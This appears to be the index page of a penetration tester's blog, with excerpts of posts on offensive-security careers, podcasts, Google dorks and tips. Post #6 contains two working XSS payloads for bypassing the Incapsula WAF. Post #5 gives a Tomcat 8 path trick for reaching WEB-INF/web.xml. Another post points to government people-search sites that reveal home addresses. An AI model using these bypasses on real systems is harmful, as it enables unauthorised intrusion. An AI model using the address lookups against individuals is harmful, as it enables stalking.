Author: gainsec

So you want to be a penetration tester, security consultant, ethical hacker, red teamer or any other offensive cyber security professional? #2

Most important thing to ask yourself if you're thinking of pursuing any of these fields are Your desire to learn...Just kidding! This is a VERY common thing to hear or read in the industry... Doesn't matter how much you know walking in, just your desire to learn... This is false and bullshit. Why you ask? … Continue reading So you want to be a penetration tester, security consultant, ethical hacker, red teamer or any other offensive cyber security professional? #2

Technique, Tool and Lecture #7

Technique: Google Dork for getting results consisting only of IP addresses. You have to include 2 octets but then can use * for the right. For example if I'm looking for data on 103.10.1.1/16 I can do site:103.10.* or site:103.10.*.* Remember * aren't wildcards but they are as close as you'll get. Also remember that … Continue reading Technique, Tool and Lecture #7

So you want to be a penetration tester, security consultant, ethical hacker, red teamer or any other offensive cyber security professional? #1

This one is going to be quick, that is because I'm just linking my lecture where I go over where higher education and academia as a whole should move towards as well as provide a general overview of what it means to work professionally within offensive cyber security. Consider this my kick-off post for further … Continue reading So you want to be a penetration tester, security consultant, ethical hacker, red teamer or any other offensive cyber security professional? #1

Top 8 Podcasts For Hacking, Privacy, Cyber Security and Penetration Testing

Walk around a lot or drive a lot? Don't let that stop you from continuing your learning. Here is my list of my personal favorite podcasts that have some relevance to my role as a security consultant/penetration tester or peaks my fancy as a privacy and cyber security enthusiast.  The Privacy, Security, & OSINT Show  … Continue reading Top 8 Podcasts For Hacking, Privacy, Cyber Security and Penetration Testing

Technique, Tool and Lecture #6

Hi Guys, Time some more hacker's TLC. Or Tips and tricks for penetration testers! Anyway, here we go! Technique: 2 Incapsula WAF XSS Bypasses I haven't had a chance to use these yet but I do encounter Incapsula once in a while so I'll keep then in my bag <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';> <img/src=q onerror='new Function`al\ert\`1\``'> Source Tool: … Continue reading Technique, Tool and Lecture #6

Government Run People Search Tools

People search engines are all the rage at this moment in history. New ones appear online and go offline just as fast. These are the sites like thatsthem.com where you put in a first and last name and you get a list of addresses and other information. What if I told you that there are people search engines to find out where someone lives or who lives at what address completely free and ran by the government? Would you believe me?

Technique, Tool and Lecture #5

Technique: Quick and Easy Bypass for Tomcat 8 on Windows https://x.x.x.x/WEB-INF/web.xml -> 403 Forbidden https://x.x.x.x/./WEB-INF/web.xml -> 403 Forbidden https://x.x.x.x/.//WEB-INF/web.xml -> 200 OK Haven't had a chance to use this yet, but I'm sure I will soon Source Tool: Karma So awesome! Lets you search by username, domain or password. For example I can search by … Continue reading Technique, Tool and Lecture #5